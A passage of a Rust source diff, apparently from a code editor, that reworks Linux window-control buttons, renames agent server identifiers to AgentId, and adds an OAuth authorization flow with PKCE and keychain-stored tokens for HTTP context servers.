use ui::prelude::*;
#[derive(IntoElement)]
pub struct LinuxWindowControls {
- close_window_action: Box<dyn Action>,
+ id: &'static str,
+ buttons: [Option<WindowButton>; MAX_BUTTONS_PER_SIDE],
+ close_action: Box<dyn Action>,
}
impl LinuxWindowControls {
- pub fn new(close_window_action: Box<dyn Action>) -> Self {
+ pub fn new(
+ id: &'static str,
+ buttons: [Option<WindowButton>; MAX_BUTTONS_PER_SIDE],
+ close_action: Box<dyn Action>,
+ ) -> Self {
Self {
- close_window_action,
+ id,
+ buttons,
+ close_action,
}
}
}
impl RenderOnce for LinuxWindowControls {
fn render(self, window: &mut Window, cx: &mut App) -> impl IntoElement {
+ let is_maximized = window.is_maximized();
+ let supported_controls = window.window_controls();
+ let button_elements: Vec<AnyElement> = self
+ .buttons
+ .iter()
+ .filter_map(|b| *b)
+ .filter(|button| match button {
+ WindowButton::Minimize => supported_controls.minimize,
+ WindowButton::Maximize => supported_controls.maximize,
+ WindowButton::Close => true,
+ })
+ .map(|button| {
+ create_window_button(button, button.id(), is_maximized, &*self.close_action, cx)
+ })
+ .collect();
+
h_flex()
- .id("generic-window-controls")
- .px_3()
- .gap_3()
- .on_mouse_down(MouseButton::Left, |_, _, cx| cx.stop_propagation())
- .child(WindowControl::new(
- "minimize",
- WindowControlType::Minimize,
- cx,
- ))
- .child(WindowControl::new(
- "maximize-or-restore",
- if window.is_maximized() {
- WindowControlType::Restore
- } else {
- WindowControlType::Maximize
- },
- cx,
- ))
- .child(WindowControl::new_close(
- "close",
- WindowControlType::Close,
- self.close_window_action,
- cx,
- ))
+ .id(self.id)
+ .when(!button_elements.is_empty(), |el| {
+ el.gap_3()
+ .px_3()
+ .on_mouse_down(MouseButton::Left, |_, _, cx| cx.stop_propagation())
+ .children(button_elements)
+ })
+ }
+}
+
+fn create_window_button(
+ button: WindowButton,
+ id: &'static str,
+ is_maximized: bool,
+ close_action: &dyn Action,
+ cx: &mut App,
+) -> AnyElement {
+ match button {
+ WindowButton::Minimize => {
+ WindowControl::new(id, WindowControlType::Minimize, cx).into_any_element()
+ }
+ WindowButton::Maximize => WindowControl::new(
+ id,
+ if is_maximized {
+ WindowControlType::Restore
+ } else {
+ WindowControlType::Maximize
+ },
+ cx,
+ )
+ .into_any_element(),
+ WindowButton::Close => {
+ WindowControl::new_close(id, WindowControlType::Close, close_action.boxed_clone(), cx)
+ .into_any_element()
+ }
}
}
@@ -45,6 +45,7 @@ client.workspace = true
clock.workspace = true
collections.workspace = true
context_server.workspace = true
+credentials_provider.workspace = true
dap.workspace = true
extension.workspace = true
fancy-regex.workspace = true
@@ -11,18 +11,19 @@ use http_client::{AsyncBody, HttpClient};
use serde::Deserialize;
use settings::Settings as _;
-use crate::DisableAiSettings;
+use crate::{AgentId, DisableAiSettings};
const REGISTRY_URL: &str = "https://cdn.agentclientprotocol.com/registry/v1/latest/registry.json";
const REFRESH_THROTTLE_DURATION: Duration = Duration::from_secs(60 * 60);
#[derive(Clone, Debug)]
pub struct RegistryAgentMetadata {
- pub id: SharedString,
+ pub id: AgentId,
pub name: SharedString,
pub description: SharedString,
pub version: SharedString,
pub repository: Option<SharedString>,
+ pub website: Option<SharedString>,
pub icon_path: Option<SharedString>,
}
@@ -55,7 +56,7 @@ impl RegistryAgent {
}
}
- pub fn id(&self) -> &SharedString {
+ pub fn id(&self) -> &AgentId {
&self.metadata().id
}
@@ -75,6 +76,10 @@ impl RegistryAgent {
self.metadata().repository.as_ref()
}
+ pub fn website(&self) -> Option<&SharedString> {
+ self.metadata().website.as_ref()
+ }
+
pub fn icon_path(&self) -> Option<&SharedString> {
self.metadata().icon_path.as_ref()
}
@@ -167,8 +172,8 @@ impl AgentRegistryStore {
&self.agents
}
- pub fn agent(&self, id: &str) -> Option<&RegistryAgent> {
- self.agents.iter().find(|agent| agent.id().as_ref() == id)
+ pub fn agent(&self, id: &AgentId) -> Option<&RegistryAgent> {
+ self.agents.iter().find(|agent| agent.id() == id)
}
pub fn is_fetching(&self) -> bool {
@@ -364,11 +369,12 @@ async fn build_registry_agents(
.await?;
let metadata = RegistryAgentMetadata {
- id: entry.id.into(),
+ id: AgentId::new(entry.id),
name: entry.name.into(),
description: entry.description.into(),
version: entry.version.into(),
repository: entry.repository.map(Into::into),
+ website: entry.website.map(Into::into),
icon_path,
};
@@ -568,6 +574,8 @@ struct RegistryEntry {
#[serde(default)]
repository: Option<String>,
#[serde(default)]
+ website: Option<String>,
+ #[serde(default)]
icon: Option<String>,
distribution: RegistryDistribution,
}
@@ -61,28 +61,43 @@ impl std::fmt::Debug for AgentServerCommand {
}
}
-#[derive(Clone, Debug, PartialEq, Eq, Hash, PartialOrd, Ord)]
-pub struct ExternalAgentServerName(pub SharedString);
+#[derive(
+ Clone, Debug, PartialEq, Eq, Hash, PartialOrd, Ord, Serialize, Deserialize, JsonSchema,
+)]
+#[serde(transparent)]
+pub struct AgentId(pub SharedString);
+
+impl AgentId {
+ pub fn new(id: impl Into<SharedString>) -> Self {
+ AgentId(id.into())
+ }
+}
-impl std::fmt::Display for ExternalAgentServerName {
+impl std::fmt::Display for AgentId {
fn fmt(&self, f: &mut std::fmt::Formatter<'_>) -> std::fmt::Result {
write!(f, "{}", self.0)
}
}
-impl From<&'static str> for ExternalAgentServerName {
+impl From<&'static str> for AgentId {
fn from(value: &'static str) -> Self {
- ExternalAgentServerName(value.into())
+ AgentId(value.into())
}
}
-impl From<ExternalAgentServerName> for SharedString {
- fn from(value: ExternalAgentServerName) -> Self {
+impl From<AgentId> for SharedString {
+ fn from(value: AgentId) -> Self {
value.0
}
}
-impl std::borrow::Borrow<str> for ExternalAgentServerName {
+impl AsRef<str> for AgentId {
+ fn as_ref(&self) -> &str {
+ &self.0
+ }
+}
+
+impl std::borrow::Borrow<str> for AgentId {
fn borrow(&self) -> &str {
&self.0
}
@@ -100,7 +115,6 @@ pub trait ExternalAgentServer {
fn get_command(
&mut self,
extra_env: HashMap<String, String>,
- status_tx: Option<watch::Sender<SharedString>>,
new_version_available_tx: Option<watch::Sender<Option<String>>>,
cx: &mut AsyncApp,
) -> Task<Result<AgentServerCommand>>;
@@ -164,7 +178,7 @@ impl ExternalAgentEntry {
pub struct AgentServerStore {
state: AgentServerStoreState,
- pub external_agents: HashMap<ExternalAgentServerName, ExternalAgentEntry>,
+ pub external_agents: HashMap<AgentId, ExternalAgentEntry>,
}
pub struct AgentServersUpdated;
@@ -229,7 +243,7 @@ impl AgentServerStore {
.as_ref()
.map(|path| SharedString::from(path.clone()));
let icon = icon_path;
- let agent_server_name = ExternalAgentServerName(agent_name.clone().into());
+ let agent_server_name = AgentId(agent_name.clone().into());
self.external_agents
.entry(agent_server_name.clone())
.and_modify(|entry| {
@@ -243,7 +257,6 @@ impl AgentServerStore {
project_id: *project_id,
upstream_client: upstream_client.clone(),
name: agent_server_name.clone(),
- status_tx: None,
new_version_available_tx: None,
})
as Box<dyn ExternalAgentServer>,
@@ -287,13 +300,13 @@ impl AgentServerStore {
cx.emit(AgentServersUpdated);
}
- pub fn agent_icon(&self, name: &ExternalAgentServerName) -> Option<SharedString> {
+ pub fn agent_icon(&self, name: &AgentId) -> Option<SharedString> {
self.external_agents
.get(name)
.and_then(|entry| entry.icon.clone())
}
- pub fn agent_source(&self, name: &ExternalAgentServerName) -> Option<ExternalAgentSource> {
+ pub fn agent_source(&self, name: &AgentId) -> Option<ExternalAgentSource> {
self.external_agents.get(name).map(|entry| entry.source)
}
}
@@ -339,7 +352,7 @@ pub fn resolve_extension_icon_path(
}
impl AgentServerStore {
- pub fn agent_display_name(&self, name: &ExternalAgentServerName) -> Option<SharedString> {
+ pub fn agent_display_name(&self, name: &AgentId) -> Option<SharedString> {
self.external_agents
.get(name)
.and_then(|entry| entry.display_name.clone())
@@ -347,7 +360,6 @@ impl AgentServerStore {
pub fn init_remote(session: &AnyProtoClient) {
session.add_entity_message_handler(Self::handle_external_agents_updated);
- session.add_entity_message_handler(Self::handle_loading_status_updated);
session.add_entity_message_handler(Self::handle_new_version_available);
}
@@ -427,7 +439,7 @@ impl AgentServerStore {
// Insert extension agents before custom/registry so registry entries override extensions.
for (agent_name, ext_id, targets, env, icon_path, display_name) in extension_agents.iter() {
- let name = ExternalAgentServerName(agent_name.clone().into());
+ let name = AgentId(agent_name.clone().into());
let mut env = env.clone();
if let Some(settings_env) =
new_settings
@@ -466,7 +478,7 @@ impl AgentServerStore {
for (name, settings) in new_settings.iter() {
match settings {
CustomAgentServerSettings::Custom { command, .. } => {
- let agent_name = ExternalAgentServerName(name.clone().into());
+ let agent_name = AgentId(name.clone().into());
self.external_agents.insert(
agent_name.clone(),
ExternalAgentEntry::new(
@@ -488,7 +500,7 @@ impl AgentServerStore {
continue;
};
- let agent_name = ExternalAgentServerName(name.clone().into());
+ let agent_name = AgentId(name.clone().into());
match agent {
RegistryAgent::Binary(agent) => {
if !agent.supports_current_platform {
@@ -653,7 +665,7 @@ impl AgentServerStore {
pub fn get_external_agent(
&mut self,
- name: &ExternalAgentServerName,
+ name: &AgentId,
) -> Option<&mut (dyn ExternalAgentServer + 'static)> {
self.external_agents
.get_mut(name)
@@ -671,7 +683,7 @@ impl AgentServerStore {
}
}
- pub fn external_agents(&self) -> impl Iterator<Item = &ExternalAgentServerName> {
+ pub fn external_agents(&self) -> impl Iterator<Item = &AgentId> {
self.external_agents.keys()
}
@@ -695,57 +707,38 @@ impl AgentServerStore {
.get_mut(&*envelope.payload.name)
.map(|entry| entry.server.as_mut())
.with_context(|| format!("agent `{}` not found", envelope.payload.name))?;
- let (status_tx, new_version_available_tx) = downstream_client
- .clone()
- .map(|(project_id, downstream_client)| {
- let (status_tx, mut status_rx) = watch::channel(SharedString::from(""));
- let (new_version_available_tx, mut new_version_available_rx) =
- watch::channel(None);
- cx.spawn({
- let downstream_client = downstream_client.clone();
- let name = envelope.payload.name.clone();
- async move |_, _| {
- while let Some(status) = status_rx.recv().await.ok() {
- downstream_client.send(
- proto::ExternalAgentLoadingStatusUpdated {
- project_id,
- name: name.clone(),
- status: status.to_string(),
- },
- )?;
+ let new_version_available_tx =
+ downstream_client
+ .clone()
+ .map(|(project_id, downstream_client)| {
+ let (new_version_available_tx, mut new_version_available_rx) =
+ watch::channel(None);
+ cx.spawn({
+ let name = envelope.payload.name.clone();
+ async move |_, _| {
+ if let Some(version) =
+ new_version_available_rx.recv().await.ok().flatten()
+ {
+ downstream_client.send(
+ proto::NewExternalAgentVersionAvailable {
+ project_id,
+ name: name.clone(),
+ version,
+ },
+ )?;
+ }
+ anyhow::Ok(())
}
- anyhow::Ok(())
- }
- })
- .detach_and_log_err(cx);
- cx.spawn({
- let name = envelope.payload.name.clone();
- async move |_, _| {
- if let Some(version) =
- new_version_available_rx.recv().await.ok().flatten()
- {
- downstream_client.send(
- proto::NewExternalAgentVersionAvailable {
- project_id,
- name: name.clone(),
- version,
- },
- )?;
- }
- anyhow::Ok(())
- }
- })
- .detach_and_log_err(cx);
- (status_tx, new_version_available_tx)
- })
- .unzip();
+ })
+ .detach_and_log_err(cx);
+ new_version_available_tx
+ });
let mut extra_env = HashMap::default();
if no_browser {
extra_env.insert("NO_BROWSER".to_owned(), "1".to_owned());
}
anyhow::Ok(agent.get_command(
extra_env,
- status_tx,
new_version_available_tx,
&mut cx.to_async(),
))
@@ -782,13 +775,11 @@ impl AgentServerStore {
};
let mut previous_entries = std::mem::take(&mut this.external_agents);
- let mut status_txs = HashMap::default();
let mut new_version_available_txs = HashMap::default();
let mut metadata = HashMap::default();
for (name, mut entry) in previous_entries.drain() {
if let Some(agent) = entry.server.downcast_mut::<RemoteExternalAgentServer>() {
- status_txs.insert(name.clone(), agent.status_tx.take());
new_version_available_txs
.insert(name.clone(), agent.new_version_available_tx.take());
}
@@ -801,12 +792,12 @@ impl AgentServerStore {
.names
.into_iter()
.map(|name| {
- let agent_name = ExternalAgentServerName(name.into());
+ let agent_id = AgentId(name.into());
let (icon, display_name, source) = metadata
- .remove(&agent_name)
+ .remove(&agent_id)
.or_else(|| {
AgentRegistryStore::try_global(cx)
- .and_then(|store| store.read(cx).agent(&agent_name.0))
+ .and_then(|store| store.read(cx).agent(&agent_id))
.map(|s| {
(
s.icon_path().cloned(),
@@ -819,14 +810,13 @@ impl AgentServerStore {
let agent = RemoteExternalAgentServer {
project_id: *project_id,
upstream_client: upstream_client.clone(),
- name: agent_name.clone(),
- status_tx: status_txs.remove(&agent_name).flatten(),
+ name: agent_id.clone(),
new_version_available_tx: new_version_available_txs
- .remove(&agent_name)
+ .remove(&agent_id)
.flatten(),
};
(
- agent_name,
+ agent_id,
ExternalAgentEntry::new(
Box::new(agent) as Box<dyn ExternalAgentServer>,
source,
@@ -884,22 +874,6 @@ impl AgentServerStore {
})
}
- async fn handle_loading_status_updated(
- this: Entity<Self>,
- envelope: TypedEnvelope<proto::ExternalAgentLoadingStatusUpdated>,
- mut cx: AsyncApp,
- ) -> Result<()> {
- this.update(&mut cx, |this, _| {
- if let Some(agent) = this.external_agents.get_mut(&*envelope.payload.name)
- && let Some(agent) = agent.server.downcast_mut::<RemoteExternalAgentServer>()
- && let Some(status_tx) = &mut agent.status_tx
- {
- status_tx.send(envelope.payload.status.into()).ok();
- }
- });
- Ok(())
- }
-
async fn handle_new_version_available(
this: Entity<Self>,
envelope: TypedEnvelope<proto::NewExternalAgentVersionAvailable>,
@@ -918,10 +892,7 @@ impl AgentServerStore {
Ok(())
}
- pub fn get_extension_id_for_agent(
- &mut self,
- name: &ExternalAgentServerName,
- ) -> Option<Arc<str>> {
+ pub fn get_extension_id_for_agent(&mut self, name: &AgentId) -> Option<Arc<str>> {
self.external_agents.get_mut(name).and_then(|entry| {
entry
.server
@@ -935,8 +906,7 @@ impl AgentServerStore {
struct RemoteExternalAgentServer {
project_id: u64,
upstream_client: Entity<RemoteClient>,
- name: ExternalAgentServerName,
- status_tx: Option<watch::Sender<SharedString>>,
+ name: AgentId,
new_version_available_tx: Option<watch::Sender<Option<String>>>,
}
@@ -944,14 +914,12 @@ impl ExternalAgentServer for RemoteExternalAgentServer {
fn get_command(
&mut self,
extra_env: HashMap<String, String>,
- status_tx: Option<watch::Sender<SharedString>>,
new_version_available_tx: Option<watch::Sender<Option<String>>>,
cx: &mut AsyncApp,
) -> Task<Result<AgentServerCommand>> {
let project_id = self.project_id;
let name = self.name.to_string();
let upstream_client = self.upstream_client.downgrade();
- self.status_tx = status_tx;
self.new_version_available_tx = new_version_available_tx;
cx.spawn(async move |cx| {
let mut response = upstream_client
@@ -1005,7 +973,6 @@ impl ExternalAgentServer for LocalExtensionArchiveAgent {
fn get_command(
&mut self,
extra_env: HashMap<String, String>,
- _status_tx: Option<watch::Sender<SharedString>>,
_new_version_available_tx: Option<watch::Sender<Option<String>>>,
cx: &mut AsyncApp,
) -> Task<Result<AgentServerCommand>> {
@@ -1205,7 +1172,6 @@ impl ExternalAgentServer for LocalRegistryArchiveAgent {
fn get_command(
&mut self,
extra_env: HashMap<String, String>,
- _status_tx: Option<watch::Sender<SharedString>>,
_new_version_available_tx: Option<watch::Sender<Option<String>>>,
cx: &mut AsyncApp,
) -> Task<Result<AgentServerCommand>> {
@@ -1386,7 +1352,6 @@ impl ExternalAgentServer for LocalRegistryNpxAgent {
fn get_command(
&mut self,
extra_env: HashMap<String, String>,
- _status_tx: Option<watch::Sender<SharedString>>,
_new_version_available_tx: Option<watch::Sender<Option<String>>>,
cx: &mut AsyncApp,
) -> Task<Result<AgentServerCommand>> {
@@ -1409,13 +1374,8 @@ impl ExternalAgentServer for LocalRegistryNpxAgent {
.await
.unwrap_or_default();
- let mut exec_args = Vec::new();
- exec_args.push("--yes".to_string());
- exec_args.push(package.to_string());
- if !args.is_empty() {
- exec_args.push("--".to_string());
- exec_args.extend(args);
- }
+ let mut exec_args = vec!["--yes".to_string(), "--".to_string(), package.to_string()];
+ exec_args.extend(args);
let npm_command = node_runtime
.npm_command(
@@ -1453,7 +1413,6 @@ impl ExternalAgentServer for LocalCustomAgent {
fn get_command(
&mut self,
extra_env: HashMap<String, String>,
- _status_tx: Option<watch::Sender<SharedString>>,
_new_version_available_tx: Option<watch::Sender<Option<String>>>,
cx: &mut AsyncApp,
) -> Task<Result<AgentServerCommand>> {
@@ -1482,10 +1441,6 @@ impl ExternalAgentServer for LocalCustomAgent {
}
}
-pub const GEMINI_NAME: &str = "gemini";
-pub const CLAUDE_AGENT_NAME: &str = "claude-acp";
-pub const CODEX_NAME: &str = "codex-acp";
-
#[derive(Default, Clone, JsonSchema, Debug, PartialEq, RegisterSetting)]
pub struct AllAgentServersSettings(pub HashMap<String, CustomAgentServerSettings>);
@@ -527,7 +527,10 @@ impl LocalBufferStore {
let new_file = if let Some(entry) = snapshot_entry {
File {
disk_state: match entry.mtime {
- Some(mtime) => DiskState::Present { mtime },
+ Some(mtime) => DiskState::Present {
+ mtime,
+ size: entry.size,
+ },
None => old_file.disk_state,
},
is_local: true,
@@ -7,10 +7,16 @@ use std::time::Duration;
use anyhow::{Context as _, Result};
use collections::{HashMap, HashSet};
+use context_server::oauth::{self, McpOAuthTokenProvider, OAuthDiscovery, OAuthSession};
+use context_server::transport::{HttpTransport, TransportError};
use context_server::{ContextServer, ContextServerCommand, ContextServerId};
-use futures::{FutureExt as _, future::Either, future::join_all};
+use credentials_provider::CredentialsProvider;
+use futures::future::Either;
+use futures::{FutureExt as _, StreamExt as _, future::join_all};
use gpui::{App, AsyncApp, Context, Entity, EventEmitter, Subscription, Task, WeakEntity, actions};
+use http_client::HttpClient;
use itertools::Itertools;
+use rand::Rng as _;
use registry::ContextServerDescriptorRegistry;
use remote::RemoteClient;
use rpc::{AnyProtoClient, TypedEnvelope, proto};
@@ -45,6 +51,12 @@ pub enum ContextServerStatus {
Running,
Stopped,
Error(Arc<str>),
+ /// The server returned 401 and OAuth authorization is needed. The UI
+ /// should show an "Authenticate" button.
+ AuthRequired,
+ /// The OAuth browser flow is in progress — the user has been redirected
+ /// to the authorization server and we're waiting for the callback.
+ Authenticating,
}
impl ContextServerStatus {
@@ -54,6 +66,8 @@ impl ContextServerStatus {
ContextServerState::Running { .. } => ContextServerStatus::Running,
ContextServerState::Stopped { .. } => ContextServerStatus::Stopped,
ContextServerState::Error { error, .. } => ContextServerStatus::Error(error.clone()),
+ ContextServerState::AuthRequired { .. } => ContextServerStatus::AuthRequired,
+ ContextServerState::Authenticating { .. } => ContextServerStatus::Authenticating,
}
}
}
@@ -77,24 +91,42 @@ enum ContextServerState {
configuration: Arc<ContextServerConfiguration>,
error: Arc<str>,
},
+ /// The server requires OAuth authorization before it can be used. The
+ /// `OAuthDiscovery` holds everything needed to start the browser flow.
+ AuthRequired {
+ server: Arc<ContextServer>,
+ configuration: Arc<ContextServerConfiguration>,
+ discovery: Arc<OAuthDiscovery>,
+ },
+ /// The OAuth browser flow is in progress. The user has been redirected
+ /// to the authorization server and we're waiting for the callback.
+ Authenticating {
+ server: Arc<ContextServer>,
+ configuration: Arc<ContextServerConfiguration>,
+ _task: Task<()>,
+ },
}
impl ContextServerState {
pub fn server(&self) -> Arc<ContextServer> {
match self {
- ContextServerState::Starting { server, .. } => server.clone(),
- ContextServerState::Running { server, .. } => server.clone(),
- ContextServerState::Stopped { server, .. } => server.clone(),
- ContextServerState::Error { server, .. } => server.clone(),
+ ContextServerState::Starting { server, .. }
+ | ContextServerState::Running { server, .. }
+ | ContextServerState::Stopped { server, .. }
+ | ContextServerState::Error { server, .. }
+ | ContextServerState::AuthRequired { server, .. }
+ | ContextServerState::Authenticating { server, .. } => server.clone(),
}
}
pub fn configuration(&self) -> Arc<ContextServerConfiguration> {
match self {
- ContextServerState::Starting { configuration, .. } => configuration.clone(),
- ContextServerState::Running { configuration, .. } => configuration.clone(),
- ContextServerState::Stopped { configuration, .. } => configuration.clone(),
- ContextServerState::Error { configuration, .. } => configuration.clone(),
+ ContextServerState::Starting { configuration, .. }
+ | ContextServerState::Running { configuration, .. }
+ | ContextServerState::Stopped { configuration, .. }
+ | ContextServerState::Error { configuration, .. }
+ | ContextServerState::AuthRequired { configuration, .. }
+ | ContextServerState::Authenticating { configuration, .. } => configuration.clone(),
}
}
}
@@ -126,6 +158,15 @@ impl ContextServerConfiguration {
}
}
+ pub fn has_static_auth_header(&self) -> bool {
+ match self {
+ ContextServerConfiguration::Http { headers, .. } => headers
+ .keys()
+ .any(|k| k.eq_ignore_ascii_case("authorization")),
+ _ => false,
+ }
+ }
+
pub fn remote(&self) -> bool {
match self {
ContextServerConfiguration::Custom { remote, .. } => *remote,
@@ -517,9 +558,10 @@ impl ContextServerStore {
pub fn start_server(&mut self, server: Arc<ContextServer>, cx: &mut Context<Self>) {
cx.spawn(async move |this, cx| {
let this = this.upgrade().context("Context server store dropped")?;
+ let id = server.id();
let settings = this
.update(cx, |this, _| {
- this.context_server_settings.get(&server.id().0).cloned()
+ this.context_server_settings.get(&id.0).cloned()
})
.context("Failed to get context server settings")?;
@@ -532,7 +574,7 @@ impl ContextServerStore {
});
let configuration = ContextServerConfiguration::from_settings(
settings,
- server.id(),
+ id.clone(),
registry,
worktree_store,
cx,
@@ -590,7 +632,11 @@ impl ContextServerStore {
let id = server.id();
if matches!(
self.servers.get(&id),
- Some(ContextServerState::Starting { .. } | ContextServerState::Running { .. })
+ Some(
+ ContextServerState::Starting { .. }
+ | ContextServerState::Running { .. }
+ | ContextServerState::Authenticating { .. },
+ )
) {
self.stop_server(&id, cx).log_err();
}
@@ -600,38 +646,20 @@ impl ContextServerStore {
let configuration = configuration.clone();
async move |this, cx| {
- match server.clone().start(cx).await {
+ let new_state = match server.clone().start(cx).await {
Ok(_) => {
debug_assert!(server.client().is_some());
-
- this.update(cx, |this, cx| {
- this.update_server_state(
- id.clone(),
- ContextServerState::Running {
- server,
- configuration,
- },
- cx,
- )
- })
- .log_err()
- }
- Err(err) => {
- log::error!("{} context server failed to start: {}", id, err);
- this.update(cx, |this, cx| {
- this.update_server_state(
- id.clone(),
- ContextServerState::Error {
- configuration,
- server,
- error: err.to_string().into(),
- },
- cx,
- )
- })
- .log_err()
+ ContextServerState::Running {
+ server,
+ configuration,
+ }
}
+ Err(err) => resolve_start_failure(&id, err, server, configuration, cx).await,
};
+ this.update(cx, |this, cx| {
+ this.update_server_state(id.clone(), new_state, cx)
+ })
+ .log_err();
}
});
@@ -651,6 +679,20 @@ impl ContextServerStore {
.servers
.remove(id)
.context("Context server not found")?;
+
+ if let ContextServerConfiguration::Http { url, .. } = state.configuration().as_ref() {
+ let server_url = url.clone();
+ let id = id.clone();
+ cx.spawn(async move |_this, cx| {
+ let credentials_provider = cx.update(|cx| <dyn CredentialsProvider>::global(cx));
+ if let Err(err) = Self::clear_session(&credentials_provider, &server_url, &cx).await
+ {
+ log::warn!("{} failed to clear OAuth session on removal: {}", id, err);
+ }
+ })
+ .detach();
+ }
+
drop(state);
cx.emit(ServerStatusChangedEvent {
server_id: id.clone(),
@@ -742,29 +784,71 @@ impl ContextServerStore {
configuration
};
+ if let Some(server) = this.update(cx, |this, _| {
+ this.context_server_factory
+ .as_ref()
+ .map(|factory| factory(id.clone(), configuration.clone()))
+ })? {
+ return Ok((server, configuration));
+ }
+
+ let cached_token_provider: Option<Arc<dyn oauth::OAuthTokenProvider>> =
+ if let ContextServerConfiguration::Http { url, .. } = configuration.as_ref() {
+ if configuration.has_static_auth_header() {
+ None
+ } else {
+ let credentials_provider =
+ cx.update(|cx| <dyn CredentialsProvider>::global(cx));
+ let http_client = cx.update(|cx| cx.http_client());
+
+ match Self::load_session(&credentials_provider, url, &cx).await {
+ Ok(Some(session)) => {
+ log::info!("{} loaded cached OAuth session from keychain", id);
+ Some(Self::create_oauth_token_provider(
+ &id,
+ url,
+ session,
+ http_client,
+ credentials_provider,
+ cx,
+ ))
+ }
+ Ok(None) => None,
+ Err(err) => {
+ log::warn!("{} failed to load cached OAuth session: {}", id, err);
+ None
+ }
+ }
+ }
+ } else {
+ None
+ };
+
let server: Arc<ContextServer> = this.update(cx, |this, cx| {
let global_timeout =
Self::resolve_project_settings(&this.worktree_store, cx).context_server_timeout;
- if let Some(factory) = this.context_server_factory.as_ref() {
- return anyhow::Ok(factory(id.clone(), configuration.clone()));
- }
-
match configuration.as_ref() {
ContextServerConfiguration::Http {
url,
headers,
timeout,
- } => anyhow::Ok(Arc::new(ContextServer::http(
- id,
- url,
- headers.clone(),
- cx.http_client(),
- cx.background_executor().clone(),
- Some(Duration::from_secs(
- timeout.unwrap_or(global_timeout).min(MAX_TIMEOUT_SECS),
- )),
- )?)),
+ } => {
+ let transport = HttpTransport::new_with_token_provider(
+ cx.http_client(),
+ url.to_string(),
+ headers.clone(),
+ cx.background_executor().clone(),
+ cached_token_provider.clone(),
+ );
+ anyhow::Ok(Arc::new(ContextServer::new_with_timeout(
+ id,
+ Arc::new(transport),
+ Some(Duration::from_secs(
+ timeout.unwrap_or(global_timeout).min(MAX_TIMEOUT_SECS),
+ )),
+ )))
+ }
_ => {
let mut command = configuration
.command()
@@ -861,6 +945,310 @@ impl ContextServerStore {
ProjectSettings::get(location, cx)
}
+ fn create_oauth_token_provider(
+ id: &ContextServerId,
+ server_url: &url::Url,
+ session: OAuthSession,
+ http_client: Arc<dyn HttpClient>,
+ credentials_provider: Arc<dyn CredentialsProvider>,
+ cx: &mut AsyncApp,
+ ) -> Arc<dyn oauth::OAuthTokenProvider> {
+ let (token_refresh_tx, mut token_refresh_rx) = futures::channel::mpsc::unbounded();
+ let id = id.clone();
+ let server_url = server_url.clone();
+
+ cx.spawn(async move |cx| {
+ while let Some(refreshed_session) = token_refresh_rx.next().await {
+ if let Err(err) =
+ Self::store_session(&credentials_provider, &server_url, &refreshed_session, &cx)
+ .await
+ {
+ log::warn!("{} failed to persist refreshed OAuth session: {}", id, err);
+ }
+ }
+ log::debug!("{} OAuth session persistence task ended", id);
+ })
+ .detach();
+
+ Arc::new(McpOAuthTokenProvider::new(
+ session,
+ http_client,
+ Some(token_refresh_tx),
+ ))
+ }
+
+ /// Initiate the OAuth browser flow for a server in the `AuthRequired` state.
+ ///
+ /// This starts a loopback HTTP callback server on an ephemeral port, builds
+ /// the authorization URL, opens the user's browser, waits for the callback,
+ /// exchanges the code for tokens, persists them in the keychain, and restarts
+ /// the server with the new token provider.
+ pub fn authenticate_server(
+ &mut self,
+ id: &ContextServerId,
+ cx: &mut Context<Self>,
+ ) -> Result<()> {
+ let state = self.servers.get(id).context("Context server not found")?;
+
+ let (discovery, server, configuration) = match state {
+ ContextServerState::AuthRequired {
+ discovery,
+ server,
+ configuration,
+ } => (discovery.clone(), server.clone(), configuration.clone()),
+ _ => anyhow::bail!("Server is not in AuthRequired state"),
+ };
+
+ let id = id.clone();
+
+ let task = cx.spawn({
+ let id = id.clone();
+ let server = server.clone();
+ let configuration = configuration.clone();
+ async move |this, cx| {
+ let result = Self::run_oauth_flow(
+ this.clone(),
+ id.clone(),
+ discovery.clone(),
+ configuration.clone(),
+ cx,
+ )
+ .await;
+
+ if let Err(err) = &result {
+ log::error!("{} OAuth authentication failed: {:?}", id, err);
+ // Transition back to AuthRequired so the user can retry
+ // rather than landing in a terminal Error state.
+ this.update(cx, |this, cx| {
+ this.update_server_state(
+ id.clone(),
+ ContextServerState::AuthRequired {
+ server,
+ configuration,
+ discovery,
+ },
+ cx,
+ )
+ })
+ .log_err();
+ }
+ }
+ });
+
+ self.update_server_state(
+ id,
+ ContextServerState::Authenticating {
+ server,
+ configuration,
+ _task: task,
+ },
+ cx,
+ );
+
+ Ok(())
+ }
+
+ async fn run_oauth_flow(
+ this: WeakEntity<Self>,
+ id: ContextServerId,
+ discovery: Arc<OAuthDiscovery>,
+ configuration: Arc<ContextServerConfiguration>,
+ cx: &mut AsyncApp,
+ ) -> Result<()> {
+ let resource = oauth::canonical_server_uri(&discovery.resource_metadata.resource);
+ let pkce = oauth::generate_pkce_challenge();
+
+ let mut state_bytes = [0u8; 32];
+ rand::rng().fill(&mut state_bytes);
+ let state_param: String = state_bytes.iter().map(|b| format!("{:02x}", b)).collect();
+
+ // Start a loopback HTTP server on an ephemeral port. The redirect URI
+ // includes this port so the browser sends the callback directly to our
+ // process.
+ let (redirect_uri, callback_rx) = oauth::start_callback_server()
+ .await
+ .context("Failed to start OAuth callback server")?;
+
+ let http_client = cx.update(|cx| cx.http_client());
+ let credentials_provider = cx.update(|cx| <dyn CredentialsProvider>::global(cx));
+ let server_url = match configuration.as_ref() {
+ ContextServerConfiguration::Http { url, .. } => url.clone(),
+ _ => anyhow::bail!("OAuth authentication only supported for HTTP servers"),
+ };
+
+ let client_registration =
+ oauth::resolve_client_registration(&http_client, &discovery, &redirect_uri)
+ .await
+ .context("Failed to resolve OAuth client registration")?;
+
+ let auth_url = oauth::build_authorization_url(
+ &discovery.auth_server_metadata,
+ &client_registration.client_id,
+ &redirect_uri,
+ &discovery.scopes,
+ &resource,
+ &pkce,
+ &state_param,
+ );
+
+ cx.update(|cx| cx.open_url(auth_url.as_str()));
+
+ let callback = callback_rx
+ .await
+ .map_err(|_| {
+ anyhow::anyhow!("OAuth callback server was shut down before receiving a response")
+ })?
+ .context("OAuth callback server received an invalid request")?;
+
+ if callback.state != state_param {
+ anyhow::bail!("OAuth state parameter mismatch (possible CSRF)");
+ }
+
+ let tokens = oauth::exchange_code(
+ &http_client,
+ &discovery.auth_server_metadata,
+ &callback.code,
+ &client_registration.client_id,
+ &redirect_uri,
+ &pkce.verifier,
+ &resource,
+ )
+ .await
+ .context("Failed to exchange authorization code for tokens")?;
+
+ let session = OAuthSession {
+ token_endpoint: discovery.auth_server_metadata.token_endpoint.clone(),
+ resource: discovery.resource_metadata.resource.clone(),
+ client_registration,
+ tokens,
+ };
+
